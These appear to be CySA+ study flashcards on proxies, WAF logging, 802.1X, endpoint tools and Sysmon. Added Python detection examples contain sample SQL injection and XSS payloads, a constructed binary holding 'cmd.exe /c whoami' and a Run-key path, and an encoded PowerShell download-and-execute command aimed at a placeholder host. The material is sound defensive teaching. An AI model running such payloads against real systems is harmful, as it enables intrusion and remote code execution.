CySa+ Study Notes 6 Flashcards
??? acts on behalf of internal hosts by forwarding their HTTP requests to the intended destination. This is often implemented in environments where outbound Internet traffic must comply with an administrative or security policy (content filtering, logging, malware scanning). Proxies can be classed as non-transparent or transparent.
A non-transparent proxy means that the client must be configured with the proxy server's address to use it; a transparent proxy (also called a "forced" or "intercepting" proxy) intercepts client traffic on the network path without the client having to be reconfigured.
Forward Proxy
provides for protocol-specific inbound traffic. You can deploy a ??? and configure it to listen for client requests from a public network (the Internet). The proxy then creates the appropriate request to the internal server on the corporate network and passes the response from the server back to the external client.
Reverse Proxy
*** Snort and Zeek (formerly Bro) are open-source IDSs; Security Onion is an open-source platform for security monitoring, incident response and threat hunting.
WAF: Traffic that matches a suspicious or unwanted signature will typically be logged with the source and destination addresses, why the traffic triggered an alert (which known suspicious behavior it matched), and what action was taken (based on the configured rule, e.g. log only, block, or drop the session).
A WAF log entry will include: time of the event, severity of the event, URL parameters such as the local resource path and query string, the HTTP method(s) used in the event plus request and response headers, and context for the rule, such as a reference to a database of known vulnerabilities and exploit techniques.
info
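As an added illustration (not from the study notes), the following Python snippet performs the kind of signature match a WAF applies to a request and emits a log record carrying the fields listed above: time, severity, source and destination, method, path and query, the request headers, the rule that fired with its reference text, and the action taken. The two rules, their reference text and the three sample requests are constructed for the example; real WAF rule sets are far larger and their log formats product-specific.

```python
"""Added example: minimal signature-based WAF check producing a log record.
The rules, reference strings and sample requests below are constructed."""
from datetime import datetime, timezone
import re
from urllib.parse import unquote, urlsplit

# Constructed rules: (rule id, severity, pattern, reference text, action)
RULES = [
    ("EX-001", "CRITICAL",
     re.compile(r"(?i)\bunion\b.+\bselect\b|'\s*or\s*'?\d+'?\s*=\s*'?\d"),
     "SQL injection: tautology or UNION-based probe (constructed reference)", "block"),
    ("EX-002", "HIGH",
     re.compile(r"(?i)<script\b|javascript:"),
     "Cross-site scripting: script tag or javascript: URI (constructed reference)", "block"),
]


def inspect(request, now=None):
    """Return a log record for the first matching rule, or None if the request is clean."""
    url = urlsplit(request["target"])
    # Decode percent-encoding first: an encoded quote (%27) must not slip past the pattern.
    fields = {"path": unquote(url.path), "query": unquote(url.query),
              "body": unquote(request.get("body", ""))}
    for rule_id, severity, pattern, reference, action in RULES:
        for where, text in fields.items():
            if pattern.search(text):
                return {
                    "time": (now or datetime.now(timezone.utc)).isoformat(),
                    "severity": severity,
                    "src": request["src"], "dst": request["dst"],
                    "method": request["method"],
                    "path": fields["path"], "query": fields["query"],
                    "matched_in": where,
                    "request_headers": request.get("headers", {}),
                    "rule": rule_id, "reference": reference,
                    "action": action,
                }
    return None


# Constructed sample traffic (addresses from documentation ranges).
BENIGN = {"src": "203.0.113.5", "dst": "198.51.100.10:443", "method": "GET",
          "target": "/search?q=quarterly+report", "headers": {"Host": "app.example"}}
SQLI = {"src": "203.0.113.9", "dst": "198.51.100.10:443", "method": "GET",
        "target": "/search?q=1%27%20OR%20%271%27%3D%271", "headers": {"Host": "app.example"}}
XSS = {"src": "203.0.113.9", "dst": "198.51.100.10:443", "method": "POST",
       "target": "/comment", "body": "text=%3Cscript%3Ealert(1)%3C/script%3E",
       "headers": {"Host": "app.example",
                   "Content-Type": "application/x-www-form-urlencoded"}}

if __name__ == "__main__":
    for req in (BENIGN, SQLI, XSS):
        print(inspect(req))
```

The decode-before-match step is the part worth remembering when reading WAF logs: the logged path and query are usually the normalized form, not the raw bytes the attacker sent, so the evasion attempt (here `%27` for the quote) is only visible if the raw request is also retained.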
The IEEE 802.1X standard defines a port-based NAC (PNAC) mechanism. PNAC means that the network access device (switch, wireless access point, router, or VPN concentrator, for instance) requests authentication of the connecting host before activating the port. The host requesting access is the supplicant. The network access device, referred to as the authenticator, enables only Extensible Authentication Protocol over LAN (EAPoL) on the port and waits for the device to supply authentication data. The authenticator passes the supplicant's credentials to an authentication server (typically RADIUS). The authentication server checks the credentials and grants or denies access. If access is granted, the network access device configures the port or VPN tunnel to use the appropriate VLAN and subnet on the local network and enables the port for ordinary network traffic.
info
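The port-state logic described above, as an added example in Python that is not part of the study notes: a toy model of the authenticator's controlled port. Before authentication the port forwards only frames whose EtherType is EAPoL (0x888E) and drops everything else; once the credentials relayed over EAPoL are accepted by the authentication server, the port is placed in the VLAN the server returns and ordinary frames are forwarded. The `AuthServer` class with its in-memory account table is a hypothetical stand-in for RADIUS, and the frames, user name, password and VLAN number are constructed.

```python
"""Added example: toy model of an 802.1X controlled port on an authenticator.
AuthServer is a hypothetical stand-in for RADIUS; frames and credentials are constructed."""
import struct

EAPOL_ETHERTYPE = 0x888E   # IEEE 802.1X EAP over LAN
IPV4_ETHERTYPE = 0x0800
PAE_GROUP_ADDR = b"\x01\x80\xc2\x00\x00\x03"  # destination MAC used by EAPoL


def ethertype(frame: bytes) -> int:
    """EtherType of an untagged Ethernet II frame (bytes 12-13, big-endian)."""
    if len(frame) < 14:
        raise ValueError("frame too short for an Ethernet header")
    return struct.unpack("!H", frame[12:14])[0]


class AuthServer:
    """Hypothetical authentication server: checks a credential and returns the VLAN to assign."""

    def __init__(self, accounts):
        self._accounts = accounts  # {username: (password, vlan_id)} - constructed data

    def authenticate(self, username, password):
        entry = self._accounts.get(username)
        if entry is None or entry[0] != password:
            return None           # Access-Reject
        return entry[1]           # Access-Accept carrying the VLAN assignment


class ControlledPort:
    """One switch port in the authenticator; starts in the unauthorized state."""

    def __init__(self, server):
        self.server = server
        self.authorized = False
        self.vlan = None

    def receive(self, frame: bytes) -> str:
        """Forwarding decision for a frame arriving from the supplicant side."""
        if ethertype(frame) == EAPOL_ETHERTYPE:
            return "forward-to-authenticator"   # EAPoL is always accepted, even when unauthorized
        if self.authorized:
            return f"forward-vlan-{self.vlan}"   # port is open and mapped to the assigned VLAN
        return "drop"                            # unauthorized port: all non-EAPoL traffic blocked

    def supplicant_credentials(self, username, password) -> bool:
        """Authenticator relays the supplicant's credentials and acts on the server's answer."""
        vlan = self.server.authenticate(username, password)
        if vlan is None:
            self.authorized, self.vlan = False, None
            return False
        self.authorized, self.vlan = True, vlan
        return True


def make_frame(ethertype_value: int, payload: bytes = b"") -> bytes:
    """Build a minimal Ethernet II frame (constructed source MAC)."""
    dst = PAE_GROUP_ADDR if ethertype_value == EAPOL_ETHERTYPE else b"\xff" * 6
    src = b"\x00\x11\x22\x33\x44\x55"
    return dst + src + struct.pack("!H", ethertype_value) + payload


def demo():
    """Walk a port through the unauthorized -> rejected -> authorized sequence."""
    port = ControlledPort(AuthServer({"alice": ("s3cret", 20)}))
    ip_frame = make_frame(IPV4_ETHERTYPE, b"\x45" + b"\x00" * 19)
    eapol_start = make_frame(EAPOL_ETHERTYPE, b"\x01\x01\x00\x00")  # version 1, type EAPOL-Start, len 0
    results = [port.receive(ip_frame), port.receive(eapol_start)]
    port.supplicant_credentials("alice", "wrong")   # rejected: port stays closed
    results.append(port.receive(ip_frame))
    port.supplicant_credentials("alice", "s3cret")  # accepted: port opens into VLAN 20
    results.append(port.receive(ip_frame))
    return results


if __name__ == "__main__":
    print(demo())
```

The model leaves out the EAP method itself (the credentials are passed as plain values for brevity); in a real exchange they travel inside EAP packets carried by EAPoL on the supplicant side and by RADIUS on the server side, and the authenticator never interprets them.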
??? is a single agent performing multiple security tasks, including malware/intrusion detection and prevention, but also other security features such as a host firewall, web content filtering/secure search and browsing, data loss prevention (DLP) enforcement, and file/message encryption.
endpoint protection platform (EPP)
??? is focused on logging endpoint observables and indicators, combined with behavioral and anomaly-based analysis. The aim is not to prevent initial execution, but to provide real-time and historical visibility into the compromise, contain the malware within a single host, and facilitate remediation of the host to its original state.
endpoint detection and response (EDR)
Disassemblers and decompilers are software that translate low-level machine code into a more readable form: a disassembler produces assembly code, while a decompiler attempts to reconstruct an approximation of the original high-level source.
Assembly code: the human-readable mnemonics for the native processor instructions used to implement the program. A disassembler converts machine code to assembly code.
Machine code: the binary code executed by the processor.
info
??? is any sequence of encoded characters (typically ASCII or UTF-16) that appears within the executable file. String analysis can reveal everything from the variables the program is using to API calls, file paths, URLs, and more. These strings may help you identify the nature or function of the malware.
A String
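String extraction as described above, as an added example that is not part of the study notes: a small Python equivalent of the `strings` utility that pulls printable ASCII and UTF-16LE runs out of a binary, records their file offsets, and then applies a short triage filter for the kinds of artifacts an analyst looks for first (DLL names, URLs, command shells, Run-key paths). The sample binary blob and the triage pattern are constructed for the example; the UTF-16LE pass matters on Windows malware because wide strings are invisible to an ASCII-only scan.

```python
"""Added example: strings-style extraction of ASCII and UTF-16LE runs from a binary blob.
SAMPLE is a constructed byte string, not a real file."""
import re


def extract_strings(blob: bytes, min_len: int = 4):
    """Return [(offset, encoding, text)] for every printable run of at least min_len characters,
    sorted by offset. ASCII runs use bytes 0x20-0x7e; UTF-16LE runs are the same bytes each
    followed by a NUL, which is how Windows wide strings are laid out."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), "ascii", m.group().decode("ascii"))
             for m in ascii_re.finditer(blob)]
    found += [(m.start(), "utf-16le", m.group().decode("utf-16-le"))
              for m in utf16_re.finditer(blob)]
    return sorted(found)


# Constructed triage pattern: things worth a second look during malware analysis.
INTERESTING = re.compile(r"(?i)https?://|\.(dll|exe)\b|cmd\.exe|powershell|\\CurrentVersion\\Run")


def triage(strings):
    """Keep only the extracted strings that match the triage pattern."""
    return [s for s in strings if INTERESTING.search(s[2])]


# Constructed sample "binary": a DOS header fragment, import names, a few code bytes,
# two wide strings and a persistence registry path.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    + b"kernel32.dll\x00VirtualAlloc\x00WriteProcessMemory\x00"
    + b"\x8b\xec\x83\xec\x10"
    + "http://198.51.100.7/update.bin".encode("utf-16-le") + b"\x00\x00"
    + "cmd.exe /c whoami".encode("utf-16-le") + b"\x00\x00"
    + b"\x01\x02\x03Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
)

if __name__ == "__main__":
    for offset, enc, text in extract_strings(SAMPLE):
        print(f"{offset:#08x} {enc:8} {text}")
    print("triage:", [t for _, _, t in triage(extract_strings(SAMPLE))])
```

Raising `min_len` cuts noise from code bytes that happen to be printable; lowering it recovers short tokens such as two-letter flags at the cost of many false hits. Packed or encrypted samples yield almost nothing here, which is itself a useful signal that dynamic analysis or unpacking is needed.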
Process Monitor (Sysinternals) is suited to recording and analyzing how a process interacts with the system. With Process Monitor you can analyze every operation that a process undertakes (file, Registry, network and process/thread activity), the status of that operation, and any additional input/output detail of that operation. You can also analyze each operation's thread stack to find its root cause.
info
??? is a logging version of Process Monitor: it runs as a system service and writes the same types of activity to the Windows event log, using a configurable filter to focus on security-relevant event types such as process creation, network connections, and driver or image loads. Forwarded to a SIEM, these events can provide a basic intrusion detection capability.
System Monitor (sysmon)
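The basic intrusion detection that Sysmon logging enables, as an added example that is not part of the study notes: a Python detector that parses Sysmon Event ID 1 (process creation) records in the XML form exported from the Windows event log and applies two common rules, an Office application spawning a command shell, and PowerShell launched with an encoded command, which it decodes to show the hidden script. The two event records, the user, paths and the encoded payload are constructed for the example; the field names (`Image`, `CommandLine`, `ParentImage`, `User`) are the ones Sysmon uses for Event ID 1.

```python
"""Added example: rule-based detection over constructed Sysmon Event ID 1 records.
The events, user names, paths and payload below are constructed, not captured."""
import base64
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")


def parse_event(xml_text: str):
    """Return (event id, {Data Name: text}) from a Windows event-log XML record."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(xml_text: str):
    """Apply the two rules to one record; return a list of (rule name, detail)."""
    event_id, d = parse_event(xml_text)
    if event_id != 1:                      # only process-creation events are handled here
        return []
    image, parent = basename(d.get("Image", "")), basename(d.get("ParentImage", ""))
    hits = []
    if parent in OFFICE and image in SHELLS:
        hits.append(("office-spawns-shell", f"{parent} -> {image}"))
    m = ENCODED_ARG.search(d.get("CommandLine", ""))
    if image == "powershell.exe" and m:
        # -EncodedCommand takes base64 of a UTF-16LE string; decode it so the analyst sees the script
        script = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
        hits.append(("powershell-encoded-command", script))
    return hits


def make_event(image, command_line, parent_image, parent_cmd, user="CORP\\alice"):
    """Build a Sysmon Event ID 1 record in the exported XML layout (constructed values)."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        '<System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID>'
        '<TimeCreated SystemTime="2024-05-01T10:00:00.000Z"/></System><EventData>'
        '<Data Name="UtcTime">2024-05-01 10:00:00.000</Data>'
        f'<Data Name="Image">{image}</Data>'
        f'<Data Name="CommandLine">{command_line}</Data>'
        f'<Data Name="User">{user}</Data>'
        f'<Data Name="ParentImage">{parent_image}</Data>'
        f'<Data Name="ParentCommandLine">{parent_cmd}</Data>'
        '</EventData></Event>'
    )


# Constructed payload and events.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SUSPICIOUS = make_event(
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    f"powershell.exe -nop -w hidden -enc {ENCODED}",
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    r"WINWORD.EXE /n invoice.docm",
)
BENIGN = make_event(
    r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt",
    r"C:\Windows\explorer.exe", "explorer.exe",
)

if __name__ == "__main__":
    for name, rec in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, detect(rec))
```

Both rules depend on Sysmon logging process creation with the parent image and full command line, so the Sysmon configuration must not filter those events out for the images of interest; a rule that only sees the child image would miss the Office-to-shell relationship entirely.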